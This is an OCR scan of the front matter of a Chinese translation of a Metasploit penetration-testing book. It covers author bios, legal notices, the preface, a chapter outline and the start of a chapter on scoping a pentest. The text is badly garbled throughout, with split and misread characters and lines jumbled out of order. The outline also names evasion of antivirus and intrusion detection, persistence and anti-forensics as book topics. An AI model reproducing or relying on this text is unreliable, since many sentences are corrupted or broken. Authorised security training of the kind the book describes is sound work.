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尼 普 恩 * 机 斯 瓦尔 
(Nipun Jaswal ) 


信息 安全 专家 、|T 安 全 研究 人 员 ， 在 渗透 
测试 、 漏 洞 研究 、 监 控 解 决 方案 等 网 络 安 
全 方面 拥有 10 年 专业 经 验 。 目 前 在 
Lucideus 公 司 负责 红 队 和 漏洞 研究 服务 以 
及 其 他 企业 客户 服务 。 曾 在 Eforensics、 
Hakin9 和 Security Kaizen 等 著名 安全 
杂志 上 发 表 过 大 量 关 于 |T 安 全 的 文章 ， 曾 
为 Apple、Microsoft、AT&T 等 公司 进行 
漏洞 发 掘 。 


信息 安全 顾问 ， 目 前 在 高 校 从 事 网 络 安全 
方面 的 科研 和 教学 工作 。 多 年 来 一 直 从事 
渗透 测试 方面 的 研究 工作 。 在 网 络 安全 部 
署 、 网 络 攻击 与 防御 以 及 社会 工程 学 等 方 
面 有 十 分 丰富 的 实践 经 验 。 目 前 出 版 
有 《Wireshark 网 络 分 析 从 入 门 到 实 
践 》《Python 渗 透 测试 编程 技术 : 方法 与 
实践 》《 诸 神 之 眼 : Nmap 网 络 安全 审计 
技术 揭秘 》 与 《Kali Linux 2 网 络 渗透 测 
试 实践 指南 》 等 作品 。 联 系 方式 : 
lihuafeng1999(m163.com. 
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图 灵 社 区 的 电子 书 没有 采用 专 有 客 
户 端 ， 您 可 以 在 任意 设备 上 ， 用 自 
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我 们 愿意 相信 读者 具有 这 样 的 良知 
和 觉悟 ， 与 我 们 共同 保护 知识 产权 。 


如 果 购 买 者 有 侵权 行为 ， 我 们 可 能 
对 该 用 户 实 施 包括 但 不 限于 关闭 该 
帐号 等 维权 措施 ， 并 可 能 追究 法 律 
责任 。 


ET 图 灵 程 序 设 计 丛 书 


Mastering Metasploit, Third Edition 


精通 Metasploit 
iS i 


(第 3 版 ) 


人 民 邮 电 出 版 社 
北 ox 


图 书 在 版 编目 (C I PO 数据 














精通 Metasploit 滩 透 测 试 / (X) 尼 普 恩 ， 贾 斯 瓦 
(Nipun Jaswal) 著 ; 李 华 峰 译 ，-- 3 版 . 一 北京 : 
民 邮 电 出 版 社 ，2019. 6 

(图 灵 程 序 设 计 从 书 ) 

ISBN 978-7-115-51190-4 


I. Oe II. Oee @ 李 … IT， 外 计算 机 网 络 一 
安全 技术 一 应 用 软件 I. OTP393. 08 


中 国 版 本 图 书馆 CIP 数 据 核 字 (2019) 第 082350 号 













































































内 容 提 要 


本 书 是 Metasploit 渗透 测试 的 权威 指南 ， 涵 盖 了 使 用 Metasploit 实现 渗透 测试 的 诸多 方面 ， 主 要 包括 : 
渗透 测试 的 基础 知识 ， 编 写 自 定义 渗透 测试 框架 ， 开 发 渗透 模块 ， 移 植 渗 透 模块 ， 测 试 服务 ， 虚 拟 化 测试 ， 
客户 端 渗透 ，Metasploit 中 的 扩展 功能 、 规 避 技 术 和 “特工 ”技术 ，Metasploit 的 可 视 化 管理 ， 以 及 加 速 渗 














透 测试 和 高 效 使 用 Metasploit 的 各 种 技巧 。 
本 书 适 合 渗透 测试 工程 师 、 信 息 安 全 工程 师 、 执 法 机 构 分 析 人 员 ， 以 及 网 络 与 系统 安 
好 者 和 学 生 阅 读 。 
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全 领域 的 技术 爱 


版 权 声 明 


Copyright © 2018 Packt Publishing. First published in the English language under the title Mastering 
Metasploit, Third Edition. 


Simplified Chinese-language edition copyright © 2019 by Posts & Telecom Press. All rights reserved. 


本 书 中 文 简体 字 版 由 Packt Publishing 授权 人 民 邮 电 出 版 社 独家 出 版 。 未 经 出 版 者 书面 许可 , 不 得 
以 任何 方式 复制 或 抄袭 本 书 内 容 。 
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纪念 所 有 为 国 捐躯 的 英勇 战士 。 一 一 尼 普 恩 。 RMR 
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如 今 ， 在 商业 领域 到 处 都 需要 渗透 测试 。 近 年 来 ， 随 着 网 络 和 计算 机 犯罪 现象 的 逐年 递增 ,渗透 


























测试 已 成 为 网 络 安全 研究 的 核心 问题 之 一 。 应 用 渗透 测试 技术 可 以 有 效 地 避免 来 自 企 业内 部 和 外 部 的 
有 渗透 测试 的 必要 性 就 在 于 它 可 以 发 现 网 络 、 系 统 或 者 应 用 程序 的 漏洞 。 此 外 ， 由 于 渗 
透 测 试 是 从 攻击 者 的 角度 出 发 ， 
陷 以 后 ， 渗 透 测试 还 要 利用 这 些 漏洞 来 评 佑 系统 存在 的 风险 因素 以 及 漏洞 可 能 产生 的 影响 。 








而 可 以 更 好 地 发 现 企业 的 弱点 和 威胁 。 在 发 现 系统 中 的 各 种 潜在 缺 











不 过 ,渗透 测试 能 否 成 功 很 大 程度 上 取决 于 渗透 测试 工程 师 对 目标 信息 的 掌握 情况 。 因 此 渗透 测 











试 工 程 师 通 常会 采用 黑 盒 测 试 和 白 盒 测 试 两 种 截然 不 同 的 方法 进行 工作 。 黑 盒 测试 指 的 是 渗透 测试 工 
并 没有 目标 信息 的 情况 下 开展 的 测试 。 因 此 渗透 测试 的 第 一 步 是 系统 地 收集 目标 的 信息 。 

而 在 进行 白 盒 渗透 测试 时 ， 渗 透 测 试 工 程 师 事先 掌握 了 足够 的 目标 信息 ， 可 以 直接 验证 目标 系统 可 能 
存在 的 安全 漏洞 。 
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通常 ， 一 次 完整 的 渗透 测试 包含 如 下 7 个 阶段 。 


a 前 期 交互 阶段 :渗透 测 
测试 的 所 有 关键 细节 。 
a 信息 收集 阶段 : 渗透 


试 工程 师 要 确定 渗透 测试 的 目标 和 测试 范围 。 他 们 要 和 客户 讨论 渗透 


























1 试 工程 师 采 用 主动 和 被 动 两 种 方法 来 收集 目标 信息 ， 其 中 被 动 信息 收 











集 可 以 在 完全 不 接触 目 
口 威胁 建 模 阶段 :渗透 测 
从 而 确定 最 为 高 效 的 渗 
口 漏洞 分 析 阶 段 : ED 
在 实验 环境 中 进行 验证 












































标的 情况 下 进行 。 

试 工程 师 要 根据 之 前 获得 的 信息 ， 找 出 对 目标 系统 威胁 最 大 的 弱点 ， 
透 攻击 方式 。 

试 工程 师 要 找到 并 确认 目标 系统 上 存在 的 已 知 的 和 未 知 的 漏洞 ， 然 后 
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a 渗透 攻击 阶段 : 渗透 测 
着 渗透 测试 工程 师 会 尝 











试 工程 师 要 利用 在 上 一 阶段 发 现 的 漏洞 来 人 侵 日 标 系 统 。 这 通常 意味 
试 获得 目标 系统 的 控制 权 。 

















a 后 渗透 攻击 阶段 : 渗透 测试 工程 师 要 开展 一 些 实际 的 入侵 行 为 。 例 如 ， 盗 取 目 标 计算 机 的 某 
个 机 密 文 件 ， 直 接 关闭 目标 系统 ， 或 者 在 目标 系统 上 创建 一 个 新 的 远程 管理 账户 ， 等 等 。 总 





之 ,渗透 测试 工程 师 应 














该 完成 渗透 攻击 后 的 所 有 工作 。 





口 报告 阶段 : 渗透 测试 工程 师 需要 将 渗透 测试 的 结果 汇总 为 一 个 文件 ， 并 提供 漏洞 修补 和 安全 


升级 的 解决 方案 。 











当 渗透 测试 的 目标 仅仅 是 








台 计 算 机 时 ， 完 成 以 上 7 个 阶段 的 难度 不 大 。 可 是 当 渗 透 测 试 工程 师 

















要 面 对 的 目标 环境 包含 数 以 百 计 的 计算 机 时 ， 一 切 就 不 那么 容易 了 。 因 此 ,在 对 大 型 网 络 进行 渗透 测 
试 的 时 候 ， 往 往 需要 使 用 自动 化 渗透 测试 框架 来 代替 手工 测试 。 设 想 这 样 一 个 场景 : 渗透 的 目标 刚好 
是 100 台 计 算 机 ， 它 们 运行 着 同样 的 操作 系统 和 服务 。 如 果 渗 透 测试 工程 师 手 动 对 每 一 台 计 算 机 进行 
测试 ， 那么 将 会 耗费 掉 大 量 的 时 间 和 精力 。 这 种 复杂 情况 正 是 渗透 测试 框架 可 以 应 对 的 。 使 用 渗透 测 
试 框架 不 仅 可 以 节省 大 量 的 时 间 ， 同 时 也 可 以 提供 更 大 的 灵活 性 ， 从 而 灵活 地 改变 攻击 向 量 ,覆盖 更 
多 的 目标 系统 。 渗 透 测试 框架 还 可 以 将 大 部 分 攻击 向 量 、 扫 描 过 程 、 漏 洞 识别 以 及 ( 最 重要 的 ) 漏洞 
渗透 攻击 自动 化 ， 从 而 节省 时 间 并 控制 测试 节奏 。 这 就 是 Metasploit 的 作用 所 在 。 

Metasploit 是 目前 最 优秀 , 同时 也 是 使 用 最 广泛 的 渗透 测试 框架 之 一 。Metasploit 在 IT 安全 社区 享 
有 盛名 ， 不 仅 是 一 种 优秀 的 渗透 测试 框架 ， 还 有 很 多 创新 特性 ， 能 让 渗透 测试 更 加 轻松 。 

本 书 的 目标 就 是 为 你 介绍 这 个 传奇 性 的 渗透 测试 框架 。 本 书 着 重 介绍 Metasploit 渗透 测试 框架 的 
开发 、 渗 透 模块 的 编写 、 其 他 平台 成 熟 渗 透 模块 的 移植 、 系 统 服务 的 测试 以 及 复杂 的 客户 端 测试 。 此 
外 ， 本 书 还 会 指导 你 将 用 Ruby、 汇 编 或 者 脚本 语言 ( 如 Cortana ) 编写 的 外 部 渗透 测试 模块 转换 成 
Metasploit 中 的 模块 。 阅 读本 书 不 仅 能 丰富 你 的 渗透 测试 知识 ， 还 能 提高 你 的 编程 能 力 。 


读者 对 象 


本 书 的 目标 读者 是 专业 的 渗透 测试 工程 师 、 信 息 安 全 工程 师 和 执法 机 构 分 析 人 员 ， 这 些 人 已 经 具 
备 了 Metasploit 的 基础 知识 ， 希望 掌握 Metasploit 框架 的 使 用 技巧 ， 同 时 增强 渗透 模块 开发 技能 。 本 
书 还 适合 想 要 向 Metasploit 中 添加 自 定义 功能 的 研究 人 员 阅 读 。 本 书 可 帮助 初级 和 中 级 Metasploit 框 
架 使 用 者 顺利 成 长 为 专家 级 使 用 者 。 此 外 ， 本 书 还 讨论 了 Ruby 编程 和 用 Cortana 编写 攻击 模块 脚本 ， 
所 以 读者 应 该 对 这 些 编程 语言 有 所 了 解 。 


本 书 内 容 


第 1 章 “ 走 近 Metasploit 渗透 测试 框架 ”， 将 介绍 Metasploit 渗透 测试 的 基础 知识 。 我 们 将 学 习 渗 
透 测试 的 方法 论 以 及 如 何 建立 一 个 渗透 测试 的 模拟 环境 。 此 外 还 将 系统 地 介绍 渗透 测试 的 各 个 阶段 ， 
并 讨论 使 用 Metasploit 相 较 于 采用 传统 手工 测试 的 优势 。 

第 2 章 “ 打 造 定制 化 的 Metasploit 渗透 测试 框架 *"， 将 介绍 为 构建 Metasploit 渗透 模块 所 需 具备 的 
Ruby 编程 基础 ， 分 析 现 有 Metasploit 模块 的 结构 ， 还 将 详细 介绍 如 何 编写 自 定义 扫描 器 、 认 证 测试 工 
具 、 后 渗透 模块 和 登录 凭证 采集 模块 。 最 后 阐明 如 何 使 用 RailGun 开发 自 定义 模块 。 
第 3 章 “ 渗 透 模块 的 开发 过 程 ”， 将 系统 演示 如 何 编写 渗透 模块 ， 并 研究 其 中 的 开发 要 点 。 之 后 将 
讲解 如 何 进行 名 zz 测试 ,以 及 如 何 利用 调试 器 观察 应 用 程序 的 行为 ,进而 收集 开发 模块 所 需 的 重要 信 
息 。 最 后 演示 如 何 利用 收集 到 的 信息 编写 一 个 Metasploit 模块 ， 并 讨论 绕 过 SEH 和 DEP 这 类 系统 保 
护 机 制 的 方法 。 

第 4 章 “ 渗 透 模块 的 移植 ”， 将 讲解 如 何 将 公开 可 用 的 渗透 工具 移植 到 Metasploit 框架 中 , 重点 描 
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述 如 何 找 出 那些 使 用 Perl, Python 和 了 PHP 语言 编写 的 模块 的 核心 功能 ， 并 通过 Metasploit 库 和 函数 将 





它们 转化 成 与 Metasploit 兼容 的 渗透 模块 。 














第 5 章 “ 使 用 Metasploit 对 服务 进行 测试 ”， 将 讨论 如 何 对 各 种 常见 服务 进行 渗透 测试 ， 并 介绍 
Metasploit 中 的 一 些 重 要 模块 ， 这 些 模 块 可 用 来 对 SCADA 、 数 据 库 和 VOIP 服务 进行 测试 。 








第 6 章 “ 虚 拟 化 测试 的 原因 及 阶段 ", 将 简要 介绍 使 























点 介绍 可 与 Metasploit 协同 完成 渗透 测试 任务 的 工具 ( 例如 Nmap, Nessus 和 OpenVAS ) 以 及 它们 在 
Metasploit 中 的 使 用 方法 。 最 后 讲解 如 何 手 动 和 自动 生成 报表 。 




















用 Metasploit 进行 渗透 测试 的 整个 过 程 ， 并 重 





























第 7 童 “ 客 户 端 渗透 "， 重点 讨论 如 何 将 传统 的 客户 端 渗透 攻击 变 得 更 加 复杂 、 精 准 。 首 先 介 绍 一 


个 基于 浏览 器 的 渗透 模块 和 一 个 基于 文件 格式 的 渗透 模块 , 并 讲解 这 些 模块 对 被 渗透 的 Web 服务 器 和 
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网 站 用 户 的 影响 。 然 后 展示 如 何 通 过 Metasploit 中 的 DNS 欺骗 模块 将 浏览 器 的 渗透 模块 变 成 “致命 武 
”。 最 后 讲解 如 何 使 用 Kali NetHunter 渗透 Android 系统 。 


第 8 Æ “Metasploit 的 扩展 功能 "， 将 研究 Metasploit 的 基本 后 渗透 功能 和 高 级 后 渗透 功能 。 首 先 讨 














W Meterpreter 提供 的 基本 后 渗透 功能 ， 然 后 讨论 高 级 的 后 渗透 模块 。 这 一 章 不 仅 有 助 于 你 快速 了 解 如 
何 加 快 渗透 测试 过 程 ， 同 时 还 会 介绍 Metasploit 中 的 许多 功能 ， 它 们 可 以 在 你 编写 漏洞 脚本 时 帮 你 节 
省 大 量 时 间 。 这 一 章 最 后 将 探讨 如 何 实现 后 渗透 过 程 的 自动 化 。 




















第 9 章 “Metasploit 中 的 规避 技术 ”， 将 研究 如 何 使 用 Metasploit 的 功能 来 实现 攻击 载荷 对 各 种 高 














级 防御 机 制 〈 例如 杀毒 软件 ) 的 规避 ， 还 会 概述 如 何 绕 过 各 种 IDPS 工具 ( 例如 Snort) 的 签名 过 滤 功 


能 ， 以 及 如 何 绕 过 Windows 防火 墙 的 端口 阻塞 机 制 。 


























第 10 章 “Metasploit 中 的 “特工 ”技术 ”, 讨论 执法 机 构 如 何 使 用 Metasploit。 这 一 章 的 内 容 包括 : 

















会 话 代 理 , 使 用 APT 技术 实现 控制 持久 化 , 从 目标 系统 




















! 清 除 文 件 , 利用 代码 打 洞 技术 隐藏 后 门 程序 ， 


使 用 Venom 框架 生成 无 法 检测 的 攻击 载荷 ， 以 及 使 用 反 取证 模块 避免 在 目标 系统 上 留 下 痕迹 。 


















































第 11 章 “ 利 用 Armitage 实现 Metasploit 的 可 视 化 管理 ”， 将 讲解 当前 Metasploit 最 为 流行 的 图 形 
用 户 界面 一 一 Armitage， 并 使 用 Armitage 对 目标 进行 扫描 和 渗透 。 之 后 介绍 在 渗透 测试 中 红 队 如 何 使 
用 Armitage。 此 外 ， 还 将 详细 讲解 Cortana， 并 利用 它 来 编写 自动 化 渗透 攻击 的 脚本 。 最 后 讨论 如 何 

















在 Armitage 中 添加 自 定义 功能 ， 以 及 如 何 创 建 自 定义 界面 和 菜单 。 


第 12 章 “ 技 巧 与 穿 门 ”， 会 讲解 加 速 渗透 测试 和 高 效 使 用 Metasploit 的 各 种 技巧 。 


本 书 要 求 


1 果 你 想 完成 本 书 中 的 示例 ， 将 需要 六 七 台 计 算 机 
机 ， 其 他 几 台 则 作为 渗透 测试 的 靶 机 。 


xr 
































(也 可 以 是 虚拟 机 )， 其 中 一 台 作 为 渗透 测试 


除 此 以 外 ,你 还 需要 Kali Linux 的 最 新 VMware 映像 文件 , 它 在 默认 情况 下 已 经 包含 了 Metasploit, 
并 且 包 含 创建 本 书 示 例 所 需 的 所 有 其 他 工具 。 不 过 ， 在 某 些 情况 下 ， 你 可 以 使 用 安装 了 Metasploit 的 








最 新 版 Ubuntu 桌面 操作 系统 。 

你 还 需要 将 Ubuntu, Windows 7、Windows 10, Windows Server 2008, Windows Server 2012 和 
Metasploitable 2 安装 到 虚拟 机 中 ， 或 者 直接 安装 到 计算 机 上 ， 这 些 操作 系统 将 作为 Metasploit 渗透 测 
TAI EUBIL 

此 外 ， 本 书 的 每 一 章 都 提供 了 示例 中 使 用 的 其 他 工具 和 存在 漏洞 的 软件 的 下 载 链接 。 


下 载 示例 代码 文件 
你 可 以 使 用 自己 的 账户 从 www.packtpub.com 下 载 本 书 的 代码 示例 文件 。 如 果 你 是 通过 其 他 途径 
购买 的 本 书 ， 那 么 可 以 访问 www.packtpub.com/support 进行 注册 ， 这 些 文件 将 会 通过 电子 邮件 发 送 给 你 。 
你 可 以 通过 以 下 步骤 来 下 载 这 些 代 码 文件 。 
(1) 在 www.packtpub.com 进行 登录 或 者 注册 。 
Q)3kE& "SUPPORT" 标签 。 
(3) 点 击 “Code Downloads & Errata" , 
(4) 在 搜索 框 中 输入 书 名 ， 并 遵循 提示 指令 。 
下 载 之 后 ， 请 确保 使 用 如 下 软件 的 最 新 版 本 来 解压 该 文件 : 


口 WinRAR / 7-Zip (Windows) 

O Zipeg / iZip / UnRarX (Mac) 

O 7-Zip / PeaZip (Linux) 

也 可 以 在 GitHub 上 获取 本 书 的 代码 文件 : https://github.com/PacktPublishing/Mastering-Metasploit- 
Third-Edition。 如 果 代 码 有 所 更 新 ， 我 们 将 会 在 GitHub 中 更 新 。 


https://github.com/PacktPublishing/ 上 还 有 很 多 其 他 Packt 图 书 的 代码 和 视频 。 欢 迎 查 看 ! 


下 载 彩色 图 片 


本 书 提供 了 一 个 PDF 文件 ， 其 中 包含 了 书 中 出 现 的 屏幕 截图 和 图 表 的 彩色 版 本 ， 下 载 链接 是 : 
https://www.packtpub.com/sites/default/files/downloads/MasteringMetasploitThirdEdition ColorImages.pdf。 


排版 约定 


本 书 采 用 以 下 排版 约定 。 
正文 中 的 代码 、 数 据 库 表 名 和 用 户 输入 用 等 宽 字 体 表 示 。 例 如 :“ 可 以 看 到 ， 我 们 在 会 话 1 里 面 
使 用 了 post/windows/manage/inject. host 模块 。” 


代码 段 的 格式 如 下 : 
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irb(main):001:0» 2 
-2 


命令 行 输入 或 者 输出 写成 如 下 形式 : 


msf > openvas config list 
[*] OpenVAS list of configs 


新 术语 和 重点 强调 的 内 容 以 黑体 字 显 示 。 


ep 此 图 标 表示 警告 或 重要 说 明 。 
s 此 图 标 表示 提示 和 技巧 。 


联系 我 们 

欢迎 你 与 我 们 取得 联系 。 

一 般 反 馈 : 请 以 电子 邮件 的 形式 发 送 到 feedback@packtpub.com， 并 在 邮件 主题 中 注 明 书 名 。 如 
果 你 对 本 书 有 任何 疑问 ， 可 以 将 问题 发 送 至 questions@packtpub.com。 

Wh: 虽然 我 们 已 尽力 确保 本 书 内 容 正 确 , 但 出 错 仍 旧 在 所 难免 。 如 果 你 在 书 中 发 现任 何 文 字 或 
者 代码 错误 ,欢迎 将 这 些 错误 提交 给 我 们 ， 以 便 帮 助 我 们 改进 本 书 的 后 续 版 本 ， 从 而 避免 其 他 读者 产 
生 不 必要 的 误解 。 如 果 你 发 现 了 错误 ,请 访问 网 页 http:/www.packtpub.com/submit-errata， 选 择 相 应 图 
书 ， 单 击 Errata Submission Form 链接 ， 然 后 填写 具体 的 错误 信息 即 可 。” 

RAR: 如果 你 发 现 我 们 的 作品 在 互联 网 上 以 任何 形式 被 非法 复制 ， 请 立即 告知 我 们 相关 网 址 或 
网 站 名 称 ， 以 便 我 们 采取 措施 。 请 将 可 疑 盗版 材料 的 链接 发 送 到 copyright@packtpub.com。 

成 为 作者 : 如 果 你 在 某 一 方面 很 有 造 话 ， 并 且 愿 意 著 书 或 参与 写作 ， 可 以 参考 我 们 的 作者 指南 : 


authors.packtpub.com。 
评论 
我 们 欢迎 读 考 的 反馈 意见 。 如 果 你 阅读 并 使 用 了 本 书 ， 为 什么 不 在 购书 网 站 上 发 表 一 条 评论 呢 ? 


如 果 你 发 表 了 评论 ,那么 潜在 的 读者 就 可 以 看 到 并 根据 你 公正 的 意见 来 做 出 购买 决定 ，Packt 也 可 以 
了 解 你 对 我 们 产品 的 看 法 ， 作 者 也 可 以 看 到 你 对 他 们 的 书 的 反馈 。 谢 谢 ! 


有 关 Packt 的 更 多 信息 ， 请 访问 packtpub.com。 





































































































CD 本 书 中 文 版 勘误 请 到 http://www.ituring.com.cn/book/2657 查看 和 提交 。 一 一 编者 注 
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本 书 内 容 仅 限于 以 合乎 道德 的 方式 使 用 。 如 果 你 没 


























了 得 到 目标 系统 所 有 者 的 书 
本 书 中 的 任何 内 容 发 起 渗透 攻击 。 如 果 你 采取 非法 行动 ,很 可 能 会 被 逮捕 并 起 诉 。 




















硬 许 可 ， 请 勿 使 用 
如 果 你 滥用 本 书 中 


























的 任何 信息 ，Packt 出 版 社 将 不 承担 任何 责任 。 本 书 内 容 只 能 在 测试 环境 时 
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统 负责 人 的 书面 授权 。 


电子 书 
扫描 如 下 二 维 码 ， 即 可 购买 本 书 的 电子 版 。 
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渗透 测试 是 一 种 有 目的 性 的 、 针 对 目标 机 构 计算 机 系统 安全 的 检测 评估 方法 。 渗 透 测 试 可 以 发 现 
系统 的 漏洞 和 安全 机 制 方面 的 隐患 ， 并 以 此 进行 渗透 攻击 来 取得 目标 计算 机 的 控制 权 。 通 过 渗透 测试 
可 以 知道 目标 机 构 的 计算 机 系统 是 否 易于 受到 攻击 ， 现 有 的 安全 部 署 是 否 能 妥善 地 抵御 攻击 ， 以 及 哪 
部 分 安全 机 制 可 能 被 绕 过 ， 等 等 。 渗 透 测试 的 主要 目的 是 改善 目标 机 构 的 安全 性 。 

正 所 谓 “ 工 欲 善 其 事 ， 必 先 利 其 器 ”， 渗 透 测试 能 否 成 功 很 大 程度 上 取决 于 测试 时 是 否 使 用 了 正 
确 的 工具 和 技术 。 渗 透 测试 工程 师 必 须 选 择 正确 的 渗透 测试 工具 和 技术 ， 才 能 保证 任务 的 完成 。 当 提 
到 最 优秀 的 渗透 测试 工具 时 ， 安 全 业界 的 绝 大 多 数 人 士 都 会 首先 想到 Metasploit 渗透 框架 。 现 在 ， 
Metasploit 被 公认 是 进行 渗透 测试 时 最 有 效 的 安全 审计 工具 之 一 , 它 提 供 了 最 全 面 的 漏洞 渗透 模块 库 ， 
集成 了 优秀 的 模块 开发 环境 ， 具 有 强大 的 信息 收集 和 Web 测试 能 力 及 其 他 许多 功能 。 

本 书 不 仅 介 绍 了 Metasploit 渗透 框架 的 功能 与 用 法 ， 还 重点 讲解 了 如 何 开发 Metasploit 模块 和 扩 
展 Metasploit 框架 。 本 书 假定 读者 已 经 掌握 了 Metasploit 渗透 框架 的 基础 知识 。 在 本 书 的 部 分 章节 中 ， 
我 们 也 将 带领 读者 回顾 一 些 Metasploit 渗透 框架 的 基础 性 操作 。 


根据 本 书 涵盖 的 所 有 知识 ， 我 们 将 按照 下 图 所 示 的 流程 进行 讲述 。 
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使 用 Metasploit 和 脚本 实现 高 级 















































































































































































































































可 顾 Metasploit 的 基本 用 法 客户 端 攻击 | 
Y ý 
. Ty 使 用 Metasploit 实 现 后 渗透 攻击 ， 
Wa 发 并 实现 acia | 
使 用 Metasploit 对 各 种 应 用 程序 进行 tE H Metasploit K RER EIE 
名 zz 测 | 试 ， JURE UA 防火 墙 、 IDS 和 [PS 的 检测 
向 Metasploit 导 入 第 三 方 模块 将 Metasploit 打 造成 首选 的 利器 | 
Y *Y 
使 用 Metasploit 测 试 服务 为 红 队 的 协同 工作 使 用 和 定制 | 
i Armitage 
使 用 Metasploit 和 一 些 外 部 工具 来 技巧 与 窍门 / 速 查 手册 








进行 渗透 测试 














2 第 1 章 Æ Metasploit AEW IRIE R 








本 章 将 回顾 渗透 测试 和 Metasploit 渗透 框架 的 基础 内 容 ， 这 有 助 于 我 们 学 习 后 面 的 内 容 。 
本 章 将 着 眼 于 以 下 几 个 要 点 。 

a 渗透 测试 的 各 个 阶段 。 

口 Metasploit 框架 的 基本 操作 。 

口 渗透 模块 和 扫描 模块 的 作用 。 

口 使 用 Metasploit 对 目标 网 络 进 行 渗透 测试 。 

口 使 用 数据 库 的 优势 。 

口 使 用 代理 来 深入 调查 内 部 网 络 。 


















































正如 “罗马 不 是 一 天 就 能 建成 的 "， 我 们 也 不 可 能 一 天 就 成 为 专家 级 的 渗透 测试 工程 师 。 从 一 个 
“菜鸟 ”转变 成 渗透 高 手 需要 大 量 的 实践 工作 ,熟悉 工作 环境 ， 具 备 对 危急 情况 的 处 理 经 验 ， 而 最 为 
重要 的 是 ,需要 在 反复 的 渗透 测试 工作 中 不 断 加 深 自己 对 该 技能 的 领悟 。 


















































要 对 一 个 目标 进行 渗透 测试 ， 首 先 必须 确保 安全 测试 计划 遵循 了 渗透 测试 执行 标准 (Penetration 
Testing Execution Standard, PTES )。 如 果 对 渗透 测试 的 流程 并 不 了 解 ， 可 以 登录 http://www.pentest- 
standard.org/index.php/PTES Technical Guidelines 来 学 习 渗 透 测 试 和 漏洞 分 析 部 分 的 内 容 。 依 照 PTES 
的 要 求 ， 下 图 给 出 了 渗透 测试 过 程 的 各 个 阶段 。 

















报告 阶段 前 期 交互 阶段 
后 渗透 攻击 阶段 信息 收集 阶段 
渗透 攻击 阶段 威胁 建 模 阶 段 
漏洞 分 析 阶 段 人 








请 参考 http//www.pentest-standard.org 网 站 ， 了 解 如 何在 工作 环境 中 设置 硬件 和 渗透 
测试 系统 阶段 信息 。 
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1.1 组 织 一 次 渗透 测试 


在 开始 复杂 的 Metasploit 攻击 之 前 ， 先 来 了 解 一 下 渗透 测试 的 各 个 阶段 ， 看 看 一 个 专业 的 渗透 测 
试 是 如 何 组 织 的 。 








1.1.1 前 期 交互 阶段 


作为 渗透 测试 的 第 一 个 步骤 ， 前 期 交互 阶段 将 确定 客户 〈 可 能 是 一 个 公司 、 机 构 或 者 网 络 ) 的 渗 
透 测 试 的 关键 细节 。 这 一 切 都 是 在 与 客户 进行 商讨 之 后 决定 的 。 这 个 阶段 是 连接 客户 与 渗透 测试 工程 
师 的 桥梁 。 在 这 个 阶段 ， 渗 透 测 试 工程 师 要 与 客户 进行 充分 的 交流 ， 以 便 客 户 对 即将 开展 的 渗透 测试 
会 对 他 的 网 络 或 者 服务 器 产生 的 影响 有 足够 的 了 解 。 
因此 ,渗透 测试 工程 师 要 以 客户 指导 者 的 身份 来 进行 这 一 阶段 的 工作 。 这 一 阶段 还 将 确定 渗透 测 
试 的 范围 、 目 标 以 及 进行 分 析 时 的 特殊 需求 ， 例 如 特殊 的 权限 、 关 键 系统 的 访问 许可 、 网 络 或 系统 赁 
证 等 。 商 讨 的 范围 还 将 包括 渗透 测试 预期 对 测试 目标 所 产生 的 积极 效果 。 在 本 阶段 ， 需 要 商讨 的 关键 
点 如 下 所 示 。 
Q 渗透 测试 的 范围 : 这 一 部 分 需要 确定 渗透 测试 的 范围 并 预 估 整个 项 目的 工作 量 。 同时 要 确定 哪 
些 目标 在 渗透 测试 范围 内 ， 哪 些 是 不 允许 进行 渗透 测试 的 。 测 试 者 要 确认 渗透 区 域内 涉及 的 
卫 地 址 范围 和 域名 范围 ， 以 及 采用 的 测试 类 型 〈 黑 盒 测试 或 白 盒 测 试 ) 比如 ， 当 进行 白 盒 测 
试 时 , 会 给 予 测试 者 哪些 权限 , 是 否 可 以 对 目标 管理 人 员 开 展 问 卷 调 查 , 在 什么 时 间 段 可 以 开 
展 渗透 测试 ， 是否 能 对 目标 环境 进行 网 络 流量 压力 测试 ， 以 及 商定 本 次 渗透 测试 的 费用 以 及 文 
付 条 款 。 关 于 渗透 范围 的 常规 文档 应 该 包含 了 如 下 问题 的 答案 。 
m 目标 组 织 最 大 的 安全 问题 是 什么 ? 
应 该 对 哪些 主机 、 网 络 地址 范围 或 者 应 用 程序 进行 测试 ? 
应 该 将 哪些 主机 、 网 络 地 址 范围 或 者 应 用 程序 排除 在 测试 范围 之 外 ? 
在 测试 范围 内 是 否 存在 第 三 方 系统 或 者 网 络 ” 它们 拥有 了 哪些 系统 ( 在 渗透 前 是 否 需 要 获得 
目标 组 织 的 书面 许可 ) ? 
渗透 测试 是 在 现场 实地 环境 中 进行 还 是 在 虚拟 测试 环境 中 进行 ? 
渗透 测试 是 否 包 括 以 下 测试 技术 : 使 用 ping 对 网 络 范围 进行 扫描 、 对 目标 主机 进行 端口 扫 
描 、 对 目标 进行 漏洞 扫描 、 对 目标 进行 渗透 测试 、 应 用 程序 级 的 操作 、 客 户 端 Java/ActiveX 
逆向 功能 、 物 理 渗 透 尝试 、 社 会 工程 学 ? 
渗透 测试 是 否 包 括 内 部 网 络 测试 ”如 果 包 括 的 话 ， 如 何 获取 权限 ? 
客户 端 /终端 用 户 系统 是 否 包 含 在 测试 范围 内 ? 如 果 包 含 的 话 ， 将 会 涉及 多 少 客户 ? 
和 否 人 允许 使 用 社会 工程 学 手段 ? 如 果 人 允许 的 话 ， 如 何 使 用 ? 
允许 使 用 拒绝 服务 攻击 ? 
可 以 使 用 具有 破坏 性 的 检查 手段 和 渗透 模块 ? 
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口 渗透 测试 的 目标 : 这 一 部 分 要 商定 本 次 渗透 测试 预期 达到 的 主要 和 次 要 效果 。 有 关 渗 透 目 标 
常 


见 问题 列举 如 下 。 
这 次 渗透 测试 的 商业 需求 是 什么 ? 
这 次 测试 是 出 于 监督 审核 的 目的 还 是 仅仅 为 了 遵循 标准 程序 ? 
目标 是 什么 ? 
- 列 出 各 种 漏洞 
- 证 明 各 种 漏洞 的 存在 
- 测试 各 种 事件 响应 
- 对 网 络 、 系 统 或 者 应 用 程序 漏洞 的 渗透 模块 开发 
- 以 上 全 部 


m 














Q 渗透 测试 用 到 的 术语 和 定义 : 这 一 部 分 要 向 客户 介绍 整个 测试 过 程 中 出 现 的 专业 术语 和 定义 ， 


以 便 客户 能 够 更 好 地 理解 整个 渗透 测试 工作 。 





口 渗透 测试 的 规则 : 这 一 部 分 要 商定 完成 渗透 测试 的 工期 ,具体 工 作 展开 的 进度 表 ， 渗 透 攻 击 





